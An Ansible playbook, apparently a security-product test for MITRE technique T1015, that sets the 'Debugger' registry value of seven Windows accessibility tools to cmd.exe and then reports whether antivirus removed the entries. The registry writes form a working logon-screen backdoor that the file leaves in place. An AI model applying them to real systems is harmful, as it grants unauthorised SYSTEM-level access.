# attack_technique: T1015
- name: T1015 - Accessibility Features
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: Attaches Command Prompt As Debugger To Process - osk
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: OSK
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string
          - name: Attaches Command Prompt As Debugger To Process - sethc
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: SETHC
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string
          - name: Attaches Command Prompt As Debugger To Process - utilman
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: UTILMAN
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string          
          - name: Attaches Command Prompt As Debugger To Process - magnify
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: MAGNIFY
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string     
          - name: Attaches Command Prompt As Debugger To Process - narrator
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: NARRATOR
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string
          - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: DISPLAYSWITCH
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string     
          - name: Attaches Command Prompt As Debugger To Process - atbroker
            #reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
            tags: ATBROKER
            win_regedit:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe
              name: Debugger
              data: 'C:\windows\system32\cmd.exe'
              type: string    
          - name: sleep for 10 seconds and continue with play to check if AV removed or Not
            tags: always
            wait_for: timeout=10
            delegate_to: localhost		
          - name: Check REG exist
            tags: OSK
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe
              name: Debugger
            register: T1015
          - name: Check REG exist
            tags: SETHC
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
              name: Debugger
            register: T1015
          - name: Check REG exist
            tags: UTILMAN
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
              name: Debugger
            register: T1015
          - name: Check REG exist
            tags: MAGNIFY
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
              name: Debugger
            register: T1015		
          - name: Check REG exist
            tags: NARRATOR
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe
              name: Debugger
            register: T1015				
          - name: Check REG exist
            tags: DISPLAYSWITCH
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe
              name: Debugger
            register: T1015
          - name: Check REG exist
            tags: ATBROKER
            win_reg_stat:
              path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe
              name: Debugger
            register: T1015    
          - name: check if playbook was blocked
            tags: always
            debug: msg="Playbook Completed:T1015#blocked#win#"
            when: T1015.exists == False        
          - name: check if playbook was successfull
            tags: always
            debug: msg="Playbook Completed#T1015#passed#win#"
            when: T1015.exists 
